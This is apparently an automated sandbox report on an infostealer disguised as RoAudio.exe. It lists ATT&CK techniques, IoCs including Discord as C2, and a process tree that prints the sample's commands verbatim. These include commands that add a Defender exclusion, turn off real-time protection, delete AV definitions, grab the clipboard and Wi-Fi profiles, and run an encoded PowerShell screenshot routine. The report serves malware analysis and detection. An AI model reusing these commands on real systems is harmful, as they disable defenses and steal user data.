c116443d201ee85e9572773ec5e1ebf75575c2d0b56611d3a4824696c6553c1d

Analysis

max time kernel
15s
max time network
17s
platform
windows10-1703_x64
resource
win10-20240404-de
resource tags

arch:x64arch:x86image:win10-20240404-delocale:de-deos:windows10-1703-x64systemwindows
submitted
02-10-2024 18:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RoAudio.exe
Size

7.5MB
MD5

8bbbdf121a25dcd4646e3a4a9ac43132
SHA1

a9eb2535f4b21603825f81dfcbbfb3c6eb8d85e5
SHA256

c116443d201ee85e9572773ec5e1ebf75575c2d0b56611d3a4824696c6553c1d
SHA512

0664d15ed04275ee4cd03380ef5fd8dc11d52f3677aea94ea1fadfd499a6d9b318e022b3745a2eda2c324bfc4b1968ccdcf227746817a34a21a9195098670f8b
SSDEEP

196608:srqkYS6AXmOshoKMuIkhVastRL5Di3uh1D7Jl:sYS9mOshouIkPftRL54YRJl

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3828	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1316	powershell.exe
2216	powershell.exe
532	powershell.exe
2680	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2476	cmd.exe
1384	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5052	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe
1452	RoAudio.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	discord.com
7	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3856	tasklist.exe
444	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001ac7d-25.dat	upx
behavioral1/memory/1452-29-0x00007FF94B1A0000-0x00007FF94B789000-memory.dmp	upx
behavioral1/files/0x000700000001ac70-31.dat	upx
behavioral1/files/0x000700000001ac7b-35.dat	upx
behavioral1/memory/1452-34-0x00007FF95E0F0000-0x00007FF95E113000-memory.dmp	upx
behavioral1/files/0x000700000001ac77-52.dat	upx
behavioral1/files/0x000700000001ac76-51.dat	upx
behavioral1/files/0x000700000001ac75-50.dat	upx
behavioral1/files/0x000700000001ac74-49.dat	upx
behavioral1/files/0x000700000001ac73-48.dat	upx
behavioral1/files/0x000700000001ac72-47.dat	upx
behavioral1/files/0x000700000001ac71-46.dat	upx
behavioral1/files/0x000800000001ac6e-45.dat	upx
behavioral1/files/0x000700000001ac82-44.dat	upx
behavioral1/files/0x000700000001ac81-43.dat	upx
behavioral1/files/0x000700000001ac80-42.dat	upx
behavioral1/files/0x000700000001ac7c-39.dat	upx
behavioral1/files/0x000700000001ac7a-38.dat	upx
behavioral1/memory/1452-36-0x00007FF95FC40000-0x00007FF95FC4F000-memory.dmp	upx
behavioral1/memory/1452-58-0x00007FF95E0C0000-0x00007FF95E0ED000-memory.dmp	upx
behavioral1/memory/1452-60-0x00007FF95E2B0000-0x00007FF95E2C9000-memory.dmp	upx
behavioral1/memory/1452-62-0x00007FF95B290000-0x00007FF95B2B3000-memory.dmp	upx
behavioral1/memory/1452-64-0x00007FF95A920000-0x00007FF95AA97000-memory.dmp	upx
behavioral1/memory/1452-66-0x00007FF95B0A0000-0x00007FF95B0B9000-memory.dmp	upx
behavioral1/memory/1452-68-0x00007FF95DCF0000-0x00007FF95DCFD000-memory.dmp	upx
behavioral1/memory/1452-70-0x00007FF95B060000-0x00007FF95B093000-memory.dmp	upx
behavioral1/memory/1452-75-0x00007FF95AF30000-0x00007FF95AFFD000-memory.dmp	upx
behavioral1/memory/1452-74-0x00007FF94B1A0000-0x00007FF94B789000-memory.dmp	upx
behavioral1/memory/1452-78-0x00007FF95E0F0000-0x00007FF95E113000-memory.dmp	upx
behavioral1/memory/1452-77-0x00007FF94AC80000-0x00007FF94B1A0000-memory.dmp	upx
behavioral1/memory/1452-83-0x00007FF95B050000-0x00007FF95B05D000-memory.dmp	upx
behavioral1/memory/1452-85-0x00007FF95E2B0000-0x00007FF95E2C9000-memory.dmp	upx
behavioral1/memory/1452-86-0x00007FF95A580000-0x00007FF95A69C000-memory.dmp	upx
behavioral1/memory/1452-82-0x00007FF95E0C0000-0x00007FF95E0ED000-memory.dmp	upx
behavioral1/memory/1452-80-0x00007FF95AF10000-0x00007FF95AF24000-memory.dmp	upx
behavioral1/memory/1452-131-0x00007FF95B290000-0x00007FF95B2B3000-memory.dmp	upx
behavioral1/memory/1452-285-0x00007FF95A920000-0x00007FF95AA97000-memory.dmp	upx
behavioral1/memory/1452-384-0x00007FF95B0A0000-0x00007FF95B0B9000-memory.dmp	upx
behavioral1/memory/1452-429-0x00007FF95DCF0000-0x00007FF95DCFD000-memory.dmp	upx
behavioral1/memory/1452-430-0x00007FF95B060000-0x00007FF95B093000-memory.dmp	upx
behavioral1/memory/1452-454-0x00007FF95AF30000-0x00007FF95AFFD000-memory.dmp	upx
behavioral1/memory/1452-480-0x00007FF94AC80000-0x00007FF94B1A0000-memory.dmp	upx
behavioral1/memory/1452-487-0x00007FF95A920000-0x00007FF95AA97000-memory.dmp	upx
behavioral1/memory/1452-495-0x00007FF95A580000-0x00007FF95A69C000-memory.dmp	upx
behavioral1/memory/1452-481-0x00007FF94B1A0000-0x00007FF94B789000-memory.dmp	upx
behavioral1/memory/1452-482-0x00007FF95E0F0000-0x00007FF95E113000-memory.dmp	upx
behavioral1/memory/1452-551-0x00007FF95A580000-0x00007FF95A69C000-memory.dmp	upx
behavioral1/memory/1452-552-0x00007FF94AC80000-0x00007FF94B1A0000-memory.dmp	upx
behavioral1/memory/1452-550-0x00007FF95B050000-0x00007FF95B05D000-memory.dmp	upx
behavioral1/memory/1452-549-0x00007FF95AF10000-0x00007FF95AF24000-memory.dmp	upx
behavioral1/memory/1452-547-0x00007FF95AF30000-0x00007FF95AFFD000-memory.dmp	upx
behavioral1/memory/1452-546-0x00007FF95B060000-0x00007FF95B093000-memory.dmp	upx
behavioral1/memory/1452-545-0x00007FF95DCF0000-0x00007FF95DCFD000-memory.dmp	upx
behavioral1/memory/1452-544-0x00007FF95B0A0000-0x00007FF95B0B9000-memory.dmp	upx
behavioral1/memory/1452-543-0x00007FF95A920000-0x00007FF95AA97000-memory.dmp	upx
behavioral1/memory/1452-542-0x00007FF95B290000-0x00007FF95B2B3000-memory.dmp	upx
behavioral1/memory/1452-541-0x00007FF95E2B0000-0x00007FF95E2C9000-memory.dmp	upx
behavioral1/memory/1452-540-0x00007FF95E0C0000-0x00007FF95E0ED000-memory.dmp	upx
behavioral1/memory/1452-539-0x00007FF95FC40000-0x00007FF95FC4F000-memory.dmp	upx
behavioral1/memory/1452-538-0x00007FF95E0F0000-0x00007FF95E113000-memory.dmp	upx
behavioral1/memory/1452-537-0x00007FF94B1A0000-0x00007FF94B789000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1116	cmd.exe
4704	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2036	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3400	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1316	powershell.exe
1316	powershell.exe
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
1316	powershell.exe
1384	powershell.exe
1384	powershell.exe
1384	powershell.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
1384	powershell.exe
5064	powershell.exe
2216	powershell.exe
2216	powershell.exe
2216	powershell.exe
32	powershell.exe
32	powershell.exe
32	powershell.exe
532	powershell.exe
532	powershell.exe
532	powershell.exe
1132	powershell.exe
1132	powershell.exe
1132	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	3856	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2680	powershell.exe
Token: SeSecurityPrivilege	2680	powershell.exe
Token: SeTakeOwnershipPrivilege	2680	powershell.exe
Token: SeLoadDriverPrivilege	2680	powershell.exe
Token: SeSystemProfilePrivilege	2680	powershell.exe
Token: SeSystemtimePrivilege	2680	powershell.exe
Token: SeProfSingleProcessPrivilege	2680	powershell.exe
Token: SeIncBasePriorityPrivilege	2680	powershell.exe
Token: SeCreatePagefilePrivilege	2680	powershell.exe
Token: SeBackupPrivilege	2680	powershell.exe
Token: SeRestorePrivilege	2680	powershell.exe
Token: SeShutdownPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeSystemEnvironmentPrivilege	2680	powershell.exe
Token: SeRemoteShutdownPrivilege	2680	powershell.exe
Token: SeUndockPrivilege	2680	powershell.exe
Token: SeManageVolumePrivilege	2680	powershell.exe
Token: 33	2680	powershell.exe
Token: 34	2680	powershell.exe
Token: 35	2680	powershell.exe
Token: 36	2680	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeIncreaseQuotaPrivilege	1200	WMIC.exe
Token: SeSecurityPrivilege	1200	WMIC.exe
Token: SeTakeOwnershipPrivilege	1200	WMIC.exe
Token: SeLoadDriverPrivilege	1200	WMIC.exe
Token: SeSystemProfilePrivilege	1200	WMIC.exe
Token: SeSystemtimePrivilege	1200	WMIC.exe
Token: SeProfSingleProcessPrivilege	1200	WMIC.exe
Token: SeIncBasePriorityPrivilege	1200	WMIC.exe
Token: SeCreatePagefilePrivilege	1200	WMIC.exe
Token: SeBackupPrivilege	1200	WMIC.exe
Token: SeRestorePrivilege	1200	WMIC.exe
Token: SeShutdownPrivilege	1200	WMIC.exe
Token: SeDebugPrivilege	1200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1200	WMIC.exe
Token: SeRemoteShutdownPrivilege	1200	WMIC.exe
Token: SeUndockPrivilege	1200	WMIC.exe
Token: SeManageVolumePrivilege	1200	WMIC.exe
Token: 33	1200	WMIC.exe
Token: 34	1200	WMIC.exe
Token: 35	1200	WMIC.exe
Token: 36	1200	WMIC.exe
Token: SeDebugPrivilege	444	tasklist.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	1200	WMIC.exe
Token: SeSecurityPrivilege	1200	WMIC.exe
Token: SeTakeOwnershipPrivilege	1200	WMIC.exe
Token: SeLoadDriverPrivilege	1200	WMIC.exe
Token: SeSystemProfilePrivilege	1200	WMIC.exe
Token: SeSystemtimePrivilege	1200	WMIC.exe
Token: SeProfSingleProcessPrivilege	1200	WMIC.exe
Token: SeIncBasePriorityPrivilege	1200	WMIC.exe
Token: SeCreatePagefilePrivilege	1200	WMIC.exe
Token: SeBackupPrivilege	1200	WMIC.exe
Token: SeRestorePrivilege	1200	WMIC.exe
Token: SeShutdownPrivilege	1200	WMIC.exe
Token: SeDebugPrivilege	1200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1200	WMIC.exe
Token: SeRemoteShutdownPrivilege	1200	WMIC.exe
Token: SeUndockPrivilege	1200	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3824 wrote to memory of 1452	3824	RoAudio.exe	72
PID 3824 wrote to memory of 1452	3824	RoAudio.exe	72
PID 1452 wrote to memory of 4460	1452	RoAudio.exe	73
PID 1452 wrote to memory of 4460	1452	RoAudio.exe	73
PID 1452 wrote to memory of 4048	1452	RoAudio.exe	74
PID 1452 wrote to memory of 4048	1452	RoAudio.exe	74
PID 1452 wrote to memory of 3372	1452	RoAudio.exe	75
PID 1452 wrote to memory of 3372	1452	RoAudio.exe	75
PID 4048 wrote to memory of 1316	4048	cmd.exe	79
PID 4048 wrote to memory of 1316	4048	cmd.exe	79
PID 3372 wrote to memory of 4816	3372	cmd.exe	80
PID 3372 wrote to memory of 4816	3372	cmd.exe	80
PID 4460 wrote to memory of 2680	4460	cmd.exe	81
PID 4460 wrote to memory of 2680	4460	cmd.exe	81
PID 1452 wrote to memory of 1132	1452	RoAudio.exe	82
PID 1452 wrote to memory of 1132	1452	RoAudio.exe	82
PID 1132 wrote to memory of 3856	1132	cmd.exe	84
PID 1132 wrote to memory of 3856	1132	cmd.exe	84
PID 1452 wrote to memory of 2588	1452	RoAudio.exe	85
PID 1452 wrote to memory of 2588	1452	RoAudio.exe	85
PID 1452 wrote to memory of 2476	1452	RoAudio.exe	86
PID 1452 wrote to memory of 2476	1452	RoAudio.exe	86
PID 1452 wrote to memory of 4656	1452	RoAudio.exe	89
PID 1452 wrote to memory of 4656	1452	RoAudio.exe	89
PID 1452 wrote to memory of 1116	1452	RoAudio.exe	90
PID 1452 wrote to memory of 1116	1452	RoAudio.exe	90
PID 1452 wrote to memory of 2004	1452	RoAudio.exe	91
PID 1452 wrote to memory of 2004	1452	RoAudio.exe	91
PID 1452 wrote to memory of 532	1452	RoAudio.exe	95
PID 1452 wrote to memory of 532	1452	RoAudio.exe	95
PID 1452 wrote to memory of 1836	1452	RoAudio.exe	97
PID 1452 wrote to memory of 1836	1452	RoAudio.exe	97
PID 2476 wrote to memory of 1384	2476	cmd.exe	100
PID 2476 wrote to memory of 1384	2476	cmd.exe	100
PID 4048 wrote to memory of 3828	4048	cmd.exe	118
PID 4048 wrote to memory of 3828	4048	cmd.exe	118
PID 2588 wrote to memory of 1200	2588	cmd.exe	102
PID 2588 wrote to memory of 1200	2588	cmd.exe	102
PID 1836 wrote to memory of 5064	1836	cmd.exe	103
PID 1836 wrote to memory of 5064	1836	cmd.exe	103
PID 2004 wrote to memory of 4608	2004	cmd.exe	104
PID 2004 wrote to memory of 4608	2004	cmd.exe	104
PID 532 wrote to memory of 3400	532	cmd.exe	105
PID 532 wrote to memory of 3400	532	cmd.exe	105
PID 4656 wrote to memory of 444	4656	cmd.exe	107
PID 4656 wrote to memory of 444	4656	cmd.exe	107
PID 1116 wrote to memory of 4704	1116	cmd.exe	108
PID 1116 wrote to memory of 4704	1116	cmd.exe	108
PID 1452 wrote to memory of 4312	1452	RoAudio.exe	109
PID 1452 wrote to memory of 4312	1452	RoAudio.exe	109
PID 4312 wrote to memory of 3160	4312	cmd.exe	111
PID 4312 wrote to memory of 3160	4312	cmd.exe	111
PID 1452 wrote to memory of 1648	1452	RoAudio.exe	112
PID 1452 wrote to memory of 1648	1452	RoAudio.exe	112
PID 1648 wrote to memory of 1436	1648	cmd.exe	114
PID 1648 wrote to memory of 1436	1648	cmd.exe	114
PID 1452 wrote to memory of 3448	1452	RoAudio.exe	115
PID 1452 wrote to memory of 3448	1452	RoAudio.exe	115
PID 5064 wrote to memory of 4600	5064	powershell.exe	117
PID 5064 wrote to memory of 4600	5064	powershell.exe	117
PID 3448 wrote to memory of 3828	3448	cmd.exe	118
PID 3448 wrote to memory of 3828	3448	cmd.exe	118
PID 1452 wrote to memory of 4896	1452	RoAudio.exe	119
PID 1452 wrote to memory of 4896	1452	RoAudio.exe	119

C:\Users\Admin\AppData\Local\Temp\RoAudio.exe
"C:\Users\Admin\AppData\Local\Temp\RoAudio.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3824
- C:\Users\Admin\AppData\Local\Temp\RoAudio.exe
  "C:\Users\Admin\AppData\Local\Temp\RoAudio.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RoAudio.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RoAudio.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NO KEY FOUND CONTACT 9P2D TO BUY!', 0, '3x8de', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3372
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NO KEY FOUND CONTACT 9P2D TO BUY!', 0, '3x8de', 0+16);close()"
      4⤵
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1132
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4656
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1116
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:532
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
